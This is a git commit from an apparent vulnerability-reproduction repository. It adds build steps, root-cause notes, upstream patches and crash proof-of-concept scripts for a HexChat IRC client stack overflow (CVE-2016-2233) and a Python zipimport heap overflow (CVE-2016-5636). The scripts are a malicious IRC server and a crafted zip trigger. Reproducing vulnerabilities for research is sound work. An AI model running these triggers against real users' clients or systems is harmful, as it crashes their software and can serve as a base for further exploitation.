add two CVEs, move one kernel vulnerability to Non memory error

VulnReproduction · May 27, 2018 · df2ff68 · df2ff68
1 parent 0b6f346
commit df2ff68
Show file tree

Hide file tree

Showing 8 changed files with 215 additions and 3 deletions.
diff --git a/CVE-2016-2233/README.md b/CVE-2016-2233/README.md
@@ -2,14 +2,64 @@
 
 ## Experiment Environment
 
+Ubuntu 14.04LTS
+
 ## INSTALL & Configuration
 
+```
+wget https://github.com/mudongliang/source-packages/raw/master/CVE-2016-2233/hexchat-2.10.0.tar.xz
+tar -xvf hexchat-2.10.0.tar.xz
+cd hexchat-2.10.0
+./configure
+make
+```
+
 ## Problems in Installation & Configuration
 
+
 ## How to trigger vulnerability
 
+Server:
+
+```
+cd src/fe-gtk
+./hexchat
+```
+
+Client:
+
+```
+python poc.py
+```
+
 ## PoCs
 
+[Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow](https://www.exploit-db.com/exploits/39657/)
+
+[HexChat CVE-2016-2233 Stack-Based Buffer Overflow Vulnerability](https://www.securityfocus.com/bid/95920/exploit)
+
 ## Vulnerability Patch
 
+### Root Cause
+
+### Stack Trace
+
+### Patch
+
+```
++	net = log_create_filename (net);
+ 	buf = g_strdup_printf ("%s" G_DIR_SEPARATOR_S "scrollback" G_DIR_SEPARATOR_S "%s" G_DIR_SEPARATOR_S "%s.txt", get_xdir (), net, "");
+ 	mkdir_p (buf);
+ 	g_free (buf);
+@@ -89,6 +90,7 @@ scrollback_get_filename (session *sess)
+ 	else
+ 		buf = NULL;
+ 	g_free (chan);
++	g_free (net);
+```
+
+Details are in the References section
+
 ## References
+
+<https://github.com/hexchat/hexchat/commit/15600f405f2d5bda6ccf0dd73957395716e0d4d3>
diff --git a/CVE-2016-2233/poc.py b/CVE-2016-2233/poc.py
@@ -0,0 +1,72 @@
+####################
+# Meta information #
+####################
+# Exploit Title: Hexchat IRC client - CAP LS Handling Stack Buffer Overflow
+# Date: 2016-02-07
+# Exploit Author: PizzaHatHacker
+# Vendor Homepage: https://hexchat.github.io/index.html
+# Software Link: https://hexchat.github.io/downloads.html
+# Version: 2.11.0
+# Tested on: HexChat 2.11.0 & Linux (64 bits) + HexChat 2.10.2 & Windows 8.1 (64 bits)
+# CVE : CVE-2016-2233
+
+#############################
+# Vulnerability description #
+#############################
+'''
+Stack Buffer Overflow in src/common/inbound.c :
+void inbound_cap_ls (server *serv, char *nick, char *extensions_str, const message_tags_data *tags_data)
+
+In this function, Hexchat IRC client receives the available extensions from 
+the IRC server (CAP LS message) and constructs the request string to indicate
+later which one to use (CAP REQ message).
+This request string is stored in the fixed size (256 bytes) byte array
+'buffer'. It has enough space for all possible options combined, BUT
+it will overflow if some options are repeated.
+
+CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:P)
+CVSS Base Score : 7.5
+Impact Subscore : 6.4
+Exploitability Subscore : 10
+'''
+
+####################
+# Proof of Concept #
+####################
+'''
+* Install Hexchat IRC Client
+* Run this Python script on a (server) machine
+* Connect to the server running the script
+* Results : Hexchat will crash (most probably access violation/segmentation fault)
+'''
+
+import socket
+import sys
+import time
+
+# Exploit configuration
+HOST = ''
+PORT = 6667
+SERVERNAME = 'localhost'
+OPTIONS = 'multi-prefix ' * 100 # 13*100 = 1300 bytes > 256 bytes
+
+# Create server socket
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+try:
+	sock.bind((HOST, PORT)) # Bind to port
+	sock.listen(0) # Start listening on socket
+
+	print 'Server listening, waiting for connection...'
+	conn, addr = sock.accept()
+
+	print 'Connected with ' + addr[0] + ':' + str(addr[1]) + ', sending packets...'
+	conn.send(':' + SERVERNAME + ' CAP * LS :' + OPTIONS + '\r\n')
+
+	# Wait and close socket
+	conn.recv(256)
+	sock.close()
+
+	print 'Done.'
+
+except socket.error as msg:
+	print 'Network error : ' + str(msg[0]) + ' ' + msg[1]
diff --git a/CVE-2016-5636/README.md b/CVE-2016-5636/README.md
@@ -2,18 +2,69 @@
 
 ## Experiment Environment
 
+Ubuntu 14.04LTS
+
 ## INSTALL & Configuration
 
+```
+wget https://github.com/mudongliang/source-packages/raw/master/CVE-2016-5636/Python-2.7.6.tgz
+tar -xvf Python-2.7.6.tgz
+cd Python-2.7.6
+./configure
+make
+```
+
 ## Problems in Installation & Configuration
 
+
 ## How to trigger vulnerability
 
+```
+python crash.py
+```
+
 ## PoCs
 
+[heap overflow in zipimporter module](https://bugs.python.org/issue26171)
+
+[Python CVE-2016-5636 Heap Buffer Overflow Vulnerability](https://www.securityfocus.com/bid/91247/exploit)
+
 ## Vulnerability Details & Patch
 
 ### Root Cause
 
+in zipimport.c
+
+```
+1116     bytes_size = compress == 0 ? data_size : data_size + 1;
+1117     if (bytes_size == 0)
+1118         bytes_size++;
+1119     raw_data = PyBytes_FromStringAndSize((char *)NULL, bytes_size);
+```
+
+If compress != 0, then bytes_size = data_size + 1
+data_size is not sanitized, so if data_size = -1, then it overflows and becomes 0.
+In that case bytes_size becomes 1 and python allocates small heap, but after that in fread, it overflows heap.
+
 ### Stack Trace
 
+### Patch
+
+```
+--- a/Modules/zipimport.c
++++ b/Modules/zipimport.c
+@@ -1111,6 +1111,11 @@ get_data(PyObject *archive, PyObject *to
+     }
+     file_offset += l;           /* Start of file data */
+ 
++    if (data_size > LONG_MAX - 1) {
++        fclose(fp);
++        PyErr_NoMemory();
++        return NULL;
++    }
+     bytes_size = compress == 0 ? data_size : data_size + 1;
+     if (bytes_size == 0)
+         bytes_size++;
+```
+
 ## References
diff --git a/CVE-2016-5636/crash.py b/CVE-2016-5636/crash.py
@@ -0,0 +1,25 @@
+import zipimport
+import zipfile
+import struct
+import sys
+from signal import *
+
+FILE = 'payload'
+ZIP = 'import.zip'
+
+payload = bytes()
+with open(FILE, 'wb') as f:
+    payload = ("A" * 1000).encode('ascii')
+    payload += struct.pack('<Q', 0x41414141)
+    f.write(payload)
+
+zf = zipfile.PyZipFile(ZIP, mode='w')
+zf.write(FILE)
+zf.close()
+
+importer = zipimport.zipimporter(ZIP)
+f = list(importer._files[FILE])
+f[1] = 1 # compress
+f[2] = -1 # file size
+importer._files[FILE] = tuple(f)
+print(importer.get_data(FILE))
diff --git a/CVE-2016-5636/patch-Modules_zipimport-CVE-2016-5636.c b/CVE-2016-5636/patch-Modules_zipimport-CVE-2016-5636.c
@@ -0,0 +1,14 @@
+--- Modules/zipimport.c.orig	2014-10-12 07:03:53 UTC
++++ Modules/zipimport.c
+@@ -1089,6 +1089,11 @@ get_data(PyObject *archive, PyObject *to
+         PyMarshal_ReadShortFromFile(fp);        /* local header size */
+     file_offset += l;           /* Start of file data */
+
++    if (data_size > LONG_MAX - 1) {
++        fclose(fp);
++        PyErr_NoMemory();
++        return NULL;
++    }
+     bytes_size = compress == 0 ? data_size : data_size + 1;
+     if (bytes_size == 0)
+         bytes_size++;
diff --git a/CVE-2016-5195/README.md → Non-MemoryError/CVE-2016-5195/README.md b/CVE-2016-5195/README.md → Non-MemoryError/CVE-2016-5195/README.md
diff --git a/Non-MemoryError/README.md b/Non-MemoryError/README.md
@@ -6,6 +6,7 @@ This folder records all the non-memoryerror vulnerabilities in temporary.
 
 - [ ] CVE-2010-3904
 - [x] CVE-2015-1328
+- [ ] CVE-2016-5195
 
 ### Java Deserialization
 

diff --git a/README.md b/README.md
@@ -221,11 +221,10 @@ If you encounter problems with keyword "Failed to lock files", you could try to
 - [x] CVE-2016-10270
 - [x] CVE-2016-10271
 - [x] CVE-2016-10272
-- [ ] CVE-2016-2233
+- [x] CVE-2016-2233
 - [x] CVE-2016-2563
 - [x] CVE-2016-4557
-- [ ] CVE-2016-5195
-- [ ] CVE-2016-5636
+- [x] CVE-2016-5636
 - [x] CVE-2016-6187
 - [x] CVE-2016-6516
 - [ ] CVE-2016-6832 (Fail to reproduce)